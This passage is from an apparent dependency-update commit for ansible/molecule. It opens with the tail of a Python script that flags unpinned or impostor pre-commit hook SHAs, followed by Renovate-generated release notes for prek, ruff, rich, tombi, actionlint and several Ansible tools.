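            repo = m.group(1)
        elif (m := REV_RE.match(line)) and repo is not None:
            pins.append((repo, m.group(1), m.group(2)))
    return pins


def check_pin(repo, rev, frozen, refs):
    """Classify one pin against the upstream ref table for its repo."""
    if not FULL_SHA_RE.fullmatch(rev):
        return Finding(repo, rev, "unpinned", "rev is a moving ref, not a 40-hex SHA")
    pointing_here = sorted(n for n, sha in refs.items() if sha.lower() == rev.lower())
    if not pointing_here:
        # The SHA may exist in a fork or PR branch of the repo network, but
        # nothing upstream advertises it: an impostor commit.
        return Finding(repo, rev, "impostor", "no fetched upstream ref points at this SHA")
    if frozen is not None and refs.get(f"refs/tags/{frozen}", "").lower() != rev.lower():
        return Finding(repo, rev, "stale-frozen",
                       f"'# frozen: {frozen}' does not resolve to this SHA")
    return Finding(repo, rev, "ok", ", ".join(pointing_here))


def check_config(config_text, upstream):
    """Run check_pin over every pin; repos missing from the table get no refs."""
    return [check_pin(repo, rev, frozen, upstream.get(repo, {}))
            for repo, rev, frozen in parse_pins(config_text)]


if __name__ == "__main__":
    results = check_config(SAMPLE_CONFIG, UPSTREAM_REFS)
    for f in results:
        print(f"{f.kind:13} {f.rev[:12]:12} {f.detail}")
    # Like `prek auto-update --check`: non-zero when anything needs attention.
    raise SystemExit(1 if any(f.kind != "ok" for f in results) else 0)
```

In a real pipeline the ref table would come from `git ls-remote --tags --heads <repo>` run per repository at check time; the exit status mirrors what the release notes describe, so the script can gate CI without rewriting the config.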
##### Enhancements
- Check and sync frozen comments during auto-update
([#​1896](https://redirect.github.com/j178/prek/pull/1896))
- Handle impostor commits in auto-update
([#​1919](https://redirect.github.com/j178/prek/pull/1919))
- Add experimental `language: dotnet` support
([#​1871](https://redirect.github.com/j178/prek/pull/1871))
- Honor repo and worktree `core.hooksPath`
([#​1892](https://redirect.github.com/j178/prek/pull/1892))
- Add `prek run --no-fail-fast` to override config file
([#​1859](https://redirect.github.com/j178/prek/pull/1859))
- Add `forbid-new-submodules` as builtin hook
([#​1853](https://redirect.github.com/j178/prek/pull/1853))
- Clean stale patch files in `cache gc`
([#​1877](https://redirect.github.com/j178/prek/pull/1877))
- Display auto-update results by config entry
([#​1922](https://redirect.github.com/j178/prek/pull/1922))
- Restrict patch directory permissions
([#​1876](https://redirect.github.com/j178/prek/pull/1876))
- Show tag names in `auto-update --freeze` output
([#​1916](https://redirect.github.com/j178/prek/pull/1916))
- Use a bitset for hook stages
([#​1860](https://redirect.github.com/j178/prek/pull/1860))
##### Bug fixes
- Canonicalize CWD and GIT\_ROOT paths
([#​1878](https://redirect.github.com/j178/prek/pull/1878))
- Ensure quotes are added for non-string revisions in `auto-update`
([#​1936](https://redirect.github.com/j178/prek/pull/1936))
##### Documentation
- Update docs for case of hooks modifying files with a non-zero exit
code ([#​1879](https://redirect.github.com/j178/prek/pull/1879))
##### Contributors
- [@​RicardoVercetti](https://redirect.github.com/RicardoVercetti)
- [@​nathanjmcdougall](https://redirect.github.com/nathanjmcdougall)
- [@​renovate](https://redirect.github.com/renovate)
- [@​sadjow](https://redirect.github.com/sadjow)
- [@​j178](https://redirect.github.com/j178)
</details>
<details>
<summary>rhysd/actionlint (rhysd/actionlint)</summary>
###
[`v1.7.12`](https://redirect.github.com/rhysd/actionlint/blob/HEAD/CHANGELOG.md#v1712---2026-03-30)
[Compare
Source](https://redirect.github.com/rhysd/actionlint/compare/v1.7.11...v1.7.12)
- Support the [`timezone` configuration in
`on.schedule`](https://docs.github.com/en/actions/reference/workflows-and-actions/workflow-syntax#onschedule)
with checks for IANA timezone string. See the
[documentation](https://redirect.github.com/rhysd/actionlint/blob/main/docs/checks.md#check-cron-syntax-and-timezone)
for more details. Note that actionlint starts to embed the timezone
database in the executables from this version so the binary sizes
slightly increase.
([#​641](https://redirect.github.com/rhysd/actionlint/issues/641),
thanks
[@​martincostello](https://redirect.github.com/martincostello))
```yaml
on:
  schedule:
    # ERROR: The timezone is not a valid IANA timezone string
    - cron: '*/5 * * * *'
      timezone: 'Asia/Somewhere'
```
- Support the [`jobs.<job_name>.environment.deployment`
configuration](https://docs.github.com/en/actions/how-tos/deploy/configure-and-manage-deployments/control-deployments#using-environments-without-deployments).
([#​639](https://redirect.github.com/rhysd/actionlint/issues/639),
thanks [@​springmeyer](https://redirect.github.com/springmeyer))
- Support the [`macos-26-intel` runner
label](https://github.blog/changelog/2026-02-26-macos-26-is-now-generally-available-for-github-hosted-runners/).
([#​629](https://redirect.github.com/rhysd/actionlint/issues/629),
thanks [@​hugovk](https://redirect.github.com/hugovk))
- Fix the outdated [table of webhook activity
types](https://redirect.github.com/rhysd/actionlint/blob/main/all_webhooks.go)
by rebuilding the [script to scrape the
table](https://redirect.github.com/rhysd/actionlint/tree/main/scripts/generate-webhook-events)
from scratch.
- Support Go 1.26 and drop the support for Go 1.24. Now supported
versions are 1.25 and 1.26.
- Tests are run on arm64 Windows in CI.
- Update the popular actions data set to the latest.
</details>
<details>
<summary>Textualize/rich (rich)</summary>
###
[`v15.0.0`](https://redirect.github.com/Textualize/rich/blob/HEAD/CHANGELOG.md#1500---2026-04-12)
[Compare
Source](https://redirect.github.com/Textualize/rich/compare/v14.3.4...v15.0.0)
##### Changed
- Breaking change: Dropped support for Python 3.8
##### Fixed
- Fixed empty print ignoring the `end` parameter
[#​4075](https://redirect.github.com/Textualize/rich/pull/4075)
- Fixed `Text.from_ansi` removing newlines
[#​4076](https://redirect.github.com/Textualize/rich/pull/4076)
- Fixed `FileProxy.isatty` not proxying
[#​4077](https://redirect.github.com/Textualize/rich/pull/4077)
- Fixed inline code in Markdown tables cells
[#​4079](https://redirect.github.com/Textualize/rich/pull/4079)
###
[`v14.3.4`](https://redirect.github.com/Textualize/rich/blob/HEAD/CHANGELOG.md#1434---2026-04-11)
[Compare
Source](https://redirect.github.com/Textualize/rich/compare/v14.3.3...v14.3.4)
##### Changed
- Improved import time with lazy loading
[#​4070](https://redirect.github.com/Textualize/rich/pull/4070)
- Changed link id generation to avoid random number generation at
runtime
[#​3845](https://redirect.github.com/Textualize/rich/pull/3845)
</details>
<details>
<summary>astral-sh/ruff (ruff)</summary>
###
[`v0.15.12`](https://redirect.github.com/astral-sh/ruff/blob/HEAD/CHANGELOG.md#01512)
[Compare
Source](https://redirect.github.com/astral-sh/ruff/compare/0.15.11...0.15.12)
Released on 2026-04-24.
##### Preview features
- Implement `#ruff:file-ignore` file-level suppressions
([#​23599](https://redirect.github.com/astral-sh/ruff/pull/23599))
- Implement `#ruff:ignore` logical-line suppressions
([#​23404](https://redirect.github.com/astral-sh/ruff/pull/23404))
- Revert preview changes to displayed diagnostic severity in LSP
([#​24789](https://redirect.github.com/astral-sh/ruff/pull/24789))
- \[`airflow`] Implement `task-branch-as-short-circuit` (`AIR004`)
([#​23579](https://redirect.github.com/astral-sh/ruff/pull/23579))
- \[`flake8-bugbear`] Fix `break`/`continue` handling in
`loop-iterator-mutation` (`B909`)
([#​24440](https://redirect.github.com/astral-sh/ruff/pull/24440))
- \[`pylint`] Fix `PLC2701` for type parameter scopes
([#​24576](https://redirect.github.com/astral-sh/ruff/pull/24576))
##### Rule changes
- \[`pandas-vet`] Suggest `.array` as well in `PD011`
([#​24805](https://redirect.github.com/astral-sh/ruff/pull/24805))
##### CLI
- Respect default Unix permissions for cache files
([#​24794](https://redirect.github.com/astral-sh/ruff/pull/24794))
##### Documentation
- \[`pylint`] Fix `PLR0124` description not to claim self-comparison
always returns the same value
([#​24749](https://redirect.github.com/astral-sh/ruff/pull/24749))
- \[`pyupgrade`] Expand docs on reusable `TypeVar`s and scoping
(`UP046`)
([#​24153](https://redirect.github.com/astral-sh/ruff/pull/24153))
- Improve rules table accessibility
([#​24711](https://redirect.github.com/astral-sh/ruff/pull/24711))
##### Contributors
- [@​dylwil3](https://redirect.github.com/dylwil3)
- [@​AlexWaygood](https://redirect.github.com/AlexWaygood)
- [@​woodruffw](https://redirect.github.com/woodruffw)
- [@​avasis-ai](https://redirect.github.com/avasis-ai)
- [@​Dev-iL](https://redirect.github.com/Dev-iL)
- [@​denyszhak](https://redirect.github.com/denyszhak)
- [@​ShipItAndPray](https://redirect.github.com/ShipItAndPray)
- [@​anishgirianish](https://redirect.github.com/anishgirianish)
- [@​augustelalande](https://redirect.github.com/augustelalande)
- [@​amyreese](https://redirect.github.com/amyreese)
- [@​majiayu000](https://redirect.github.com/majiayu000)
###
[`v0.15.11`](https://redirect.github.com/astral-sh/ruff/blob/HEAD/CHANGELOG.md#01511)
[Compare
Source](https://redirect.github.com/astral-sh/ruff/compare/0.15.10...0.15.11)
Released on 2026-04-16.
##### Preview features
- \[`ruff`] Ignore `RUF029` when function is decorated with
`asynccontextmanager`
([#​24642](https://redirect.github.com/astral-sh/ruff/pull/24642))
- \[`airflow`] Implement `airflow-xcom-pull-in-template-string`
(`AIR201`)
([#​23583](https://redirect.github.com/astral-sh/ruff/pull/23583))
- \[`flake8-bandit`] Fix `S103` false positives and negatives in mask
analysis
([#​24424](https://redirect.github.com/astral-sh/ruff/pull/24424))
##### Bug fixes
- \[`flake8-async`] Omit overridden methods for `ASYNC109`
([#​24648](https://redirect.github.com/astral-sh/ruff/pull/24648))
##### Documentation
- \[`flake8-async`] Add override mention to `ASYNC109` docs
([#​24666](https://redirect.github.com/astral-sh/ruff/pull/24666))
- Update Neovim config examples to use `vim.lsp.config`
([#​24577](https://redirect.github.com/astral-sh/ruff/pull/24577))
##### Contributors
- [@​augustelalande](https://redirect.github.com/augustelalande)
- [@​anishgirianish](https://redirect.github.com/anishgirianish)
- [@​benberryallwood](https://redirect.github.com/benberryallwood)
- [@​charliermarsh](https://redirect.github.com/charliermarsh)
- [@​Dev-iL](https://redirect.github.com/Dev-iL)
### [`v0.15.10`](https://redirect.github.com/astral-sh/ruff/blob/HEAD/CHANGELOG.md#01510)
[Compare Source](https://redirect.github.com/astral-sh/ruff/compare/0.15.9...0.15.10)
Released on 2026-04-09.
##### Preview features
- \[`flake8-logging`] Allow closures in except handlers (`LOG004`)
([#​24464](https://redirect.github.com/astral-sh/ruff/pull/24464))
- \[`flake8-self`] Make `SLF` diagnostics robust to non-self-named
variables
([#​24281](https://redirect.github.com/astral-sh/ruff/pull/24281))
- \[`flake8-simplify`] Make the fix for `collapsible-if` safe in
`preview` (`SIM102`)
([#​24371](https://redirect.github.com/astral-sh/ruff/pull/24371))
##### Bug fixes
- Avoid emitting multi-line f-string elements before Python 3.12
([#​24377](https://redirect.github.com/astral-sh/ruff/pull/24377))
- Avoid syntax error from `E502` fixes in f-strings and t-strings
([#​24410](https://redirect.github.com/astral-sh/ruff/pull/24410))
- Strip form feeds from indent passed to `dedent_to`
([#​24381](https://redirect.github.com/astral-sh/ruff/pull/24381))
- \[`pyupgrade`] Fix panic caused by handling of octals (`UP012`)
([#​24390](https://redirect.github.com/astral-sh/ruff/pull/24390))
- Reject multi-line f-string elements before Python 3.12
([#​24355](https://redirect.github.com/astral-sh/ruff/pull/24355))
##### Rule changes
- \[`ruff`] Treat f-string interpolation as potential side effect
(`RUF019`)
([#​24426](https://redirect.github.com/astral-sh/ruff/pull/24426))
##### Server
- Add support for custom file extensions
([#​24463](https://redirect.github.com/astral-sh/ruff/pull/24463))
##### Documentation
- Document adding fixes in CONTRIBUTING.md
([#​24393](https://redirect.github.com/astral-sh/ruff/pull/24393))
- Fix JSON typo in settings example
([#​24517](https://redirect.github.com/astral-sh/ruff/pull/24517))
##### Contributors
- [@​charliermarsh](https://redirect.github.com/charliermarsh)
- [@​dylwil3](https://redirect.github.com/dylwil3)
- [@​silverstein](https://redirect.github.com/silverstein)
- [@​anishgirianish](https://redirect.github.com/anishgirianish)
- [@​shizukushq](https://redirect.github.com/shizukushq)
- [@​zanieb](https://redirect.github.com/zanieb)
- [@​AlexWaygood](https://redirect.github.com/AlexWaygood)
</details>
<details>
<summary>tombi-toml/tombi (tombi)</summary>
### [`v0.10.2`](https://redirect.github.com/tombi-toml/tombi/releases/tag/v0.10.2)
[Compare Source](https://redirect.github.com/tombi-toml/tombi/compare/v0.10.1...v0.10.2)
#### What's Changed
##### 🚀 New Features
- Add references support for Cargo and pyproject workspaces by
[@​ya7010](https://redirect.github.com/ya7010) in
[#​1821](https://redirect.github.com/tombi-toml/tombi/pull/1821)
##### 🐛 Bug Fixes
- fix(lsp): resolve type definitions for scalar bindings by
[@​ya7010](https://redirect.github.com/ya7010) in
[#​1820](https://redirect.github.com/tombi-toml/tombi/pull/1820)
- fix(vscode): allow spaced toml fences by
[@​ya7010](https://redirect.github.com/ya7010) in
[#​1816](https://redirect.github.com/tombi-toml/tombi/pull/1816)
##### 🛠️ Other Changes
- fix(pyproject): link build-system requires by
[@​ya7010](https://redirect.github.com/ya7010) in
[#​1822](https://redirect.github.com/tombi-toml/tombi/pull/1822)
- feat(vscode): add TOML configuration defaults by
[@​ya7010](https://redirect.github.com/ya7010) in
[#​1818](https://redirect.github.com/tombi-toml/tombi/pull/1818)
- Deprecate path declaration navigation in pyproject and cargo by
[@​ya7010](https://redirect.github.com/ya7010) in
[#​1823](https://redirect.github.com/tombi-toml/tombi/pull/1823)
- Improve docs tables and workspace goto navigation by
[@​ya7010](https://redirect.github.com/ya7010) in
[#​1825](https://redirect.github.com/tombi-toml/tombi/pull/1825)
**Full Changelog**:
<https://github.com/tombi-toml/tombi/compare/v0.10.1...v0.10.2>
### [`v0.10.1`](https://redirect.github.com/tombi-toml/tombi/releases/tag/v0.10.1)
[Compare Source](https://redirect.github.com/tombi-toml/tombi/compare/v0.10.0...v0.10.1)
#### What's Changed
##### 🚀 New Features
- Fix tombi config path resolution and completions by
[@​ya7010](https://redirect.github.com/ya7010) in
[#​1807](https://redirect.github.com/tombi-toml/tombi/pull/1807)
##### 🐛 Bug Fixes
- fix: keep root hover range on the current key-value by
[@​ya7010](https://redirect.github.com/ya7010) in
[#​1812](https://redirect.github.com/tombi-toml/tombi/pull/1812)
- fix(config): reject empty schema glob patterns by
[@​ya7010](https://redirect.github.com/ya7010) in
[#​1814](https://redirect.github.com/tombi-toml/tombi/pull/1814)
##### 🛠️ Other Changes
- Add schema exclude support by
[@​ya7010](https://redirect.github.com/ya7010) in
[#​1813](https://redirect.github.com/tombi-toml/tombi/pull/1813)
- docs: refine formatter intro wording by
[@​ya7010](https://redirect.github.com/ya7010) in
[#​1815](https://redirect.github.com/tombi-toml/tombi/pull/1815)
**Full Changelog**:
<https://github.com/tombi-toml/tombi/compare/v0.10.0...v0.10.1>
### [`v0.10.0`](https://redirect.github.com/tombi-toml/tombi/releases/tag/v0.10.0)
[Compare Source](https://redirect.github.com/tombi-toml/tombi/compare/v0.9.26...v0.10.0)
#### What's Changed
The file path specification in `.config/tombi.toml` has been modified to
be searched starting from its parent directory, rather than from
`.config/`.
##### 🚨 Breaking Changes
- fix: add leading comment handling for empty tables and arrays in
formatting by [@​ya7010](https://redirect.github.com/ya7010) in
[#​1800](https://redirect.github.com/tombi-toml/tombi/pull/1800)
- fix: resolve project-root paths from `.config/tombi.toml` config by
[@​ya7010](https://redirect.github.com/ya7010) in
[#​1802](https://redirect.github.com/tombi-toml/tombi/pull/1802)
##### 🐛 Bug Fixes
- fix: resolve schema paths from config base dir by
[@​ya7010](https://redirect.github.com/ya7010) in
[#​1806](https://redirect.github.com/tombi-toml/tombi/pull/1806)
##### 🛠️ Other Changes
- fix: remove redundant explanation for group-blank-lines-limit and
table-blank-lines by
[@​ya7010](https://redirect.github.com/ya7010) in
[#​1799](https://redirect.github.com/tombi-toml/tombi/pull/1799)
- Strengthen README overview by
[@​ya7010](https://redirect.github.com/ya7010) in
[#​1801](https://redirect.github.com/tombi-toml/tombi/pull/1801)
- docs: correct terminology for auto sorting in documentation by
[@​ya7010](https://redirect.github.com/ya7010) in
[#​1805](https://redirect.github.com/tombi-toml/tombi/pull/1805)
- ci: cache TOMBI\_CACHE\_HOME in CI by
[@​ya7010](https://redirect.github.com/ya7010) in
[#​1804](https://redirect.github.com/tombi-toml/tombi/pull/1804)
- Add schema catalog path examples by
[@​ya7010](https://redirect.github.com/ya7010) in
[#​1803](https://redirect.github.com/tombi-toml/tombi/pull/1803)
**Full Changelog**:
<https://github.com/tombi-toml/tombi/compare/v0.9.26...v0.10.0>
### [`v0.9.26`](https://redirect.github.com/tombi-toml/tombi/releases/tag/v0.9.26)
[Compare Source](https://redirect.github.com/tombi-toml/tombi/compare/v0.9.25...v0.9.26)
#### What's Changed
##### 🚀 New Features
- feat: add example paths for schema in JSON and Rust definitions by
[@​ya7010](https://redirect.github.com/ya7010) in
[#​1798](https://redirect.github.com/tombi-toml/tombi/pull/1798)
- feat(formatter): add blank line spacing options by
[@​ya7010](https://redirect.github.com/ya7010) in
[#​1792](https://redirect.github.com/tombi-toml/tombi/pull/1792)
##### 🐛 Bug Fixes
- fix(vscode): enable markdown TOML fence injection by
[@​ya7010](https://redirect.github.com/ya7010) in
[#​1794](https://redirect.github.com/tombi-toml/tombi/pull/1794)
- chore: update codeblock ru
> ✂ **Note**
>
> PR body was truncated to here.
</details>
---
### Configuration
📅 **Schedule**: (in timezone UTC)
- Branch creation
- "before 4am on monday"
- Automerge
- Between 12:00 AM and 03:59 AM, only on Monday (`* 0-3 * * 1`)
🚦 **Automerge**: Enabled.
♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.
👻 **Immortal**: This PR will be recreated if closed unmerged. Get
[config
help](https://redirect.github.com/renovatebot/renovate/discussions) if
that's undesired.
---
- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box
---
This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/ansible/molecule).
---------
Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
Co-authored-by: Rakesh S <rakesh.s552004@gmail.com>
Dotify71 pushed a commit to Dotify71/molecule that referenced this pull request, Jun 4, 2026
> ℹ️ **Note**
>
> This PR body was truncated due to platform limits.
This PR contains the following updates:
| Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | Type | Update | Pending |
|---|---|---|---|---|---|---|
| [ansible-navigator](https://redirect.github.com/ansible/ansible-navigator) ([changelog](https://redirect.github.com/ansible/ansible-navigator/releases)) | `26.1.3` → `26.4.0` | | | dependency-groups | minor | |
| [ansible/actions](https://redirect.github.com/ansible/actions) | `v0.5.1` → `v1.1.2` | | | repository | major | |
| [ansible/ansible-lint](https://redirect.github.com/ansible/ansible-lint) | `v26.2.0` → `v26.4.0` | | | repository | minor | |
| [ansible/team-devtools](https://redirect.github.com/ansible/team-devtools) | `v26.2.0` → `v26.4.0` | | | repository | minor | |
| [astral-sh/uv-pre-commit](https://redirect.github.com/astral-sh/uv-pre-commit) | `0.10.7` → `0.11.8` | | | repository | minor | `0.11.10` (+1) |
| [biomejs/pre-commit](https://redirect.github.com/biomejs/pre-commit) | `v2.4.4` → `v2.4.14` | | | repository | patch | |
| [build](https://redirect.github.com/pypa/build) ([changelog](https://build.pypa.io/en/stable/changelog.html)) | `1.4.2` → `1.5.0` | | | dependency-groups | minor | |
| [click](https://redirect.github.com/pallets/click) ([changelog](https://click.palletsprojects.com/page/changes/)) | `8.3.2` → `8.3.3` | | | project.dependencies | patch | |
| [filelock](https://redirect.github.com/tox-dev/py-filelock) | `3.25.2` → `3.29.0` | | | dependency-groups | minor | |
| [prek](https://prek.j178.dev/) ([source](https://redirect.github.com/j178/prek), [changelog](https://redirect.github.com/j178/prek/blob/master/CHANGELOG.md)) | `0.3.8` → `0.3.11` | | | dependency-groups | patch | `0.3.13` (+1) |
| [rhysd/actionlint](https://redirect.github.com/rhysd/actionlint) | `v1.7.11` → `v1.7.12` | | | repository | patch | |
| [rich](https://redirect.github.com/Textualize/rich) | `14.3.3` → `15.0.0` | | | project.dependencies | major | |
| [ruff](https://docs.astral.sh/ruff) ([source](https://redirect.github.com/astral-sh/ruff), [changelog](https://redirect.github.com/astral-sh/ruff/blob/main/CHANGELOG.md)) | `0.15.9` → `0.15.12` | | | dependency-groups | patch | |
| [tombi](https://redirect.github.com/tombi-toml/tombi) | `0.9.14` → `0.10.2` | | | dependency-groups | minor | `0.10.5` (+2) |
| [tox](https://redirect.github.com/tox-dev/tox) ([changelog](https://tox.wiki/en/latest/changelog.html)) | `4.52.0` → `4.53.1` | | | dependency-groups | minor | |
| [tox-uv](https://redirect.github.com/tox-dev/tox-uv#tox-uv) ([changelog](https://redirect.github.com/tox-dev/tox-uv/releases)) | `1.34.0` → `1.35.1` | | | dependency-groups | minor | `1.35.2` |
| [types-jsonschema](https://redirect.github.com/python/typeshed) ([changelog](https://redirect.github.com/typeshed-internal/stub_uploader/blob/main/data/changelogs/jsonschema.md)) | `4.26.0.20260402` → `4.26.0.20260408` | | | dependency-groups | patch | |
| [types-pexpect](https://redirect.github.com/python/typeshed) ([changelog](https://redirect.github.com/typeshed-internal/stub_uploader/blob/main/data/changelogs/pexpect.md)) | `4.9.0.20260127` → `4.9.0.20260408` | | | dependency-groups | patch | |
| [types-pyyaml](https://redirect.github.com/python/typeshed) ([changelog](https://redirect.github.com/typeshed-internal/stub_uploader/blob/main/data/changelogs/PyYAML.md)) | `6.0.12.20250915` → `6.0.12.20260408` | | | dependency-groups | patch | |
Note: The `pre-commit` manager in Renovate is not supported by the
`pre-commit` maintainers or community. Please do not report any problems
there, instead [create a Discussion in the Renovate
repository](https://redirect.github.com/renovatebot/renovate/discussions/new)
if you have any questions.
---
### Release Notes
<details>
<summary>ansible/ansible-navigator (ansible-navigator)</summary>
### [`v26.4.0`](https://redirect.github.com/ansible/ansible-navigator/releases/tag/v26.4.0)
[Compare Source](https://redirect.github.com/ansible/ansible-navigator/compare/v26.1.3...v26.4.0)
#### Maintenance
- chore(deps): update all dependencies
([#​2106](https://redirect.github.com/ansible/ansible-navigator/issues/2106))
@​[renovate\[bot\]](https://redirect.github.com/apps/renovate)
- chore(deps): update all dependencies
([#​2100](https://redirect.github.com/ansible/ansible-navigator/issues/2100))
@​[renovate\[bot\]](https://redirect.github.com/apps/renovate)
- ci: Fix CI, assisted by AI
([#​2104](https://redirect.github.com/ansible/ansible-navigator/issues/2104))
[@​Andersson007](https://redirect.github.com/Andersson007)
</details>
<details>
<summary>ansible/actions (ansible/actions)</summary>
### [`v1.1.2`](https://redirect.github.com/ansible/actions/releases/tag/v1.1.2)
[Compare Source](https://redirect.github.com/ansible/actions/compare/v1.1.1...v1.1.2)
#### Fixes
- fix: make renovate and md hook use version from action
([#​112](https://redirect.github.com/ansible/actions/issues/112))
[@​ssbarnea](https://redirect.github.com/ssbarnea)
- fix: force use of newer node
([#​121](https://redirect.github.com/ansible/actions/issues/121))
[@​ssbarnea](https://redirect.github.com/ssbarnea)
#### Maintenance
- chore(deps): update all dependencies pep621
([#​120](https://redirect.github.com/ansible/actions/issues/120))
@​[renovate\[bot\]](https://redirect.github.com/apps/renovate)
- chore(deps): update all dependencies
([#​119](https://redirect.github.com/ansible/actions/issues/119))
@​[renovate\[bot\]](https://redirect.github.com/apps/renovate)
### [`v1.1.1`](https://redirect.github.com/ansible/actions/releases/tag/v1.1.1)
[Compare Source](https://redirect.github.com/ansible/actions/compare/v1.1.0...v1.1.1)
#### Fixes
- fix: address issue with shellcheck calling
([#​118](https://redirect.github.com/ansible/actions/issues/118))
[@​ssbarnea](https://redirect.github.com/ssbarnea)
#### Maintenance
- chore(deps): update all dependencies pep621
([#​117](https://redirect.github.com/ansible/actions/issues/117))
@​[renovate\[bot\]](https://redirect.github.com/apps/renovate)
- chore(deps): update all dependencies
([#​116](https://redirect.github.com/ansible/actions/issues/116))
@​[renovate\[bot\]](https://redirect.github.com/apps/renovate)
- chore(deps): update dependencies
([#​115](https://redirect.github.com/ansible/actions/issues/115))
@​[renovate\[bot\]](https://redirect.github.com/apps/renovate)
- chore(deps): update all dependencies pep621
([#​114](https://redirect.github.com/ansible/actions/issues/114))
@​[renovate\[bot\]](https://redirect.github.com/apps/renovate)
- chore(deps): update all dependencies
([#​113](https://redirect.github.com/ansible/actions/issues/113))
@​[renovate\[bot\]](https://redirect.github.com/apps/renovate)
### [`v1.1.0`](https://redirect.github.com/ansible/actions/releases/tag/v1.1.0)
[Compare Source](https://redirect.github.com/ansible/actions/compare/v1.0.1...v1.1.0)
#### Features
- feat: add pyright hook definition
([#​111](https://redirect.github.com/ansible/actions/issues/111))
[@​ssbarnea](https://redirect.github.com/ssbarnea)
#### Fixes
- fix: display gitleaks version before calling it
([#​108](https://redirect.github.com/ansible/actions/issues/108))
[@​ssbarnea](https://redirect.github.com/ssbarnea)
- fix: allow renovate to create up to 3 PRs
([#​107](https://redirect.github.com/ansible/actions/issues/107))
[@​ssbarnea](https://redirect.github.com/ssbarnea)
#### Maintenance
- chore(deps): update actions/download-artifact action
([#​109](https://redirect.github.com/ansible/actions/issues/109))
@​[renovate\[bot\]](https://redirect.github.com/apps/renovate)
- chore(deps): update all dependencies pep621
([#​110](https://redirect.github.com/ansible/actions/issues/110))
@​[renovate\[bot\]](https://redirect.github.com/apps/renovate)
- chore(deps): update all dependencies
([#​106](https://redirect.github.com/ansible/actions/issues/106))
@​[renovate\[bot\]](https://redirect.github.com/apps/renovate)
### [`v1.0.1`](https://redirect.github.com/ansible/actions/releases/tag/v1.0.1)
[Compare Source](https://redirect.github.com/ansible/actions/compare/v1...v1.0.1)
#### Fixes
- fix: configure renovate to bump minimal versions on security alerts
([#​104](https://redirect.github.com/ansible/actions/issues/104))
[@​ssbarnea](https://redirect.github.com/ssbarnea)
- fix: make codecov curl validation retry
([#​103](https://redirect.github.com/ansible/actions/issues/103))
[@​ssbarnea](https://redirect.github.com/ssbarnea)
- fix: run codespell as a tool
([#​102](https://redirect.github.com/ansible/actions/issues/102))
[@​ssbarnea](https://redirect.github.com/ssbarnea)
#### Maintenance
- chore(deps): update all dependencies to
[`bbbca2d`](https://redirect.github.com/ansible/actions/commit/bbbca2d)
([#​100](https://redirect.github.com/ansible/actions/issues/100))
@​[renovate\[bot\]](https://redirect.github.com/apps/renovate)
### [`v1.0.0`](https://redirect.github.com/ansible/actions/releases/tag/v1.0.0)
[Compare Source](https://redirect.github.com/ansible/actions/compare/v1...v1)
#### Features
- feat: add pydoclint hook definition
([#​99](https://redirect.github.com/ansible/actions/issues/99))
[@​ssbarnea](https://redirect.github.com/ssbarnea)
#### Fixes
- fix: fix shellcheck hook in local testing
([#​98](https://redirect.github.com/ansible/actions/issues/98))
[@​ssbarnea](https://redirect.github.com/ssbarnea)
- fix: use sh when calling system hooks
([#​97](https://redirect.github.com/ansible/actions/issues/97))
[@​ssbarnea](https://redirect.github.com/ssbarnea)
- fix: cancel current workflow when autofix is applied
([#​95](https://redirect.github.com/ansible/actions/issues/95))
[@​ssbarnea](https://redirect.github.com/ssbarnea)
- fix: prevent prek node install from touching package-lock.json file
([#​94](https://redirect.github.com/ansible/actions/issues/94))
[@​ssbarnea](https://redirect.github.com/ssbarnea)
#### Maintenance
- chore(deps): update all dependencies
([#​93](https://redirect.github.com/ansible/actions/issues/93))
@​[renovate\[bot\]](https://redirect.github.com/apps/renovate)
### [`v1`](https://redirect.github.com/ansible/actions/compare/v0.5.1...v1)
[Compare Source](https://redirect.github.com/ansible/actions/compare/v0.5.1...v1)
</details>
<details>
<summary>ansible/ansible-lint (ansible/ansible-lint)</summary>
### [`v26.4.0`](https://redirect.github.com/ansible/ansible-lint/releases/tag/v26.4.0)
[Compare Source](https://redirect.github.com/ansible/ansible-lint/compare/v26.3.0...v26.4.0)
#### Fixes
- fix: remove deprecated apt\_key module from examples and builtins
([#​5000](https://redirect.github.com/ansible/ansible-lint/issues/5000))
[@​cidrblock](https://redirect.github.com/cidrblock)
- fix(security): update dependencies \[SECURITY]
([#​5010](https://redirect.github.com/ansible/ansible-lint/issues/5010))
@​[renovate\[bot\]](https://redirect.github.com/apps/renovate)
- fix: avoid permission error when linting /tmp files
([#​5009](https://redirect.github.com/ansible/ansible-lint/issues/5009))
[@​ssbarnea](https://redirect.github.com/ssbarnea)
- fix: reapply false positive patch for no-changed-when rule
([#​4989](https://redirect.github.com/ansible/ansible-lint/issues/4989))
[@​Red-GV](https://redirect.github.com/Red-GV)
- docs: fix inaccuracies found during documentation audit
([#​4999](https://redirect.github.com/ansible/ansible-lint/issues/4999))
[@​cidrblock](https://redirect.github.com/cidrblock)
- fix: support collection format in mock\_roles
([#​4980](https://redirect.github.com/ansible/ansible-lint/issues/4980))
[@​emmanuel-ferdman](https://redirect.github.com/emmanuel-ferdman)
- fix(security): update dependencies \[SECURITY]
([#​4993](https://redirect.github.com/ansible/ansible-lint/issues/4993))
@​[renovate\[bot\]](https://redirect.github.com/apps/renovate)
#### Maintenance
- chore: update hooks
([#​5008](https://redirect.github.com/ansible/ansible-lint/issues/5008))
[@​ssbarnea](https://redirect.github.com/ssbarnea)
- chore: implement workaround for coverage merging failure
([#​5006](https://redirect.github.com/ansible/ansible-lint/issues/5006))
[@​ssbarnea](https://redirect.github.com/ssbarnea)
- Add support for upcoming Ubuntu 26.04
([#​4995](https://redirect.github.com/ansible/ansible-lint/issues/4995))
[@​Andiroid](https://redirect.github.com/Andiroid)
- chore(deps): update all dependencies pep621
([#​4994](https://redirect.github.com/ansible/ansible-lint/issues/4994))
@​[renovate\[bot\]](https://redirect.github.com/apps/renovate)
- chore(deps): bump black from 26.1.0 to 26.3.1 in /.config
([#​4991](https://redirect.github.com/ansible/ansible-lint/issues/4991))
@​[dependabot\[bot\]](https://redirect.github.com/apps/dependabot)
### [`v26.3.0`](https://redirect.github.com/ansible/ansible-lint/releases/tag/v26.3.0)
[Compare Source](https://redirect.github.com/ansible/ansible-lint/compare/v26.2.0...v26.3.0)
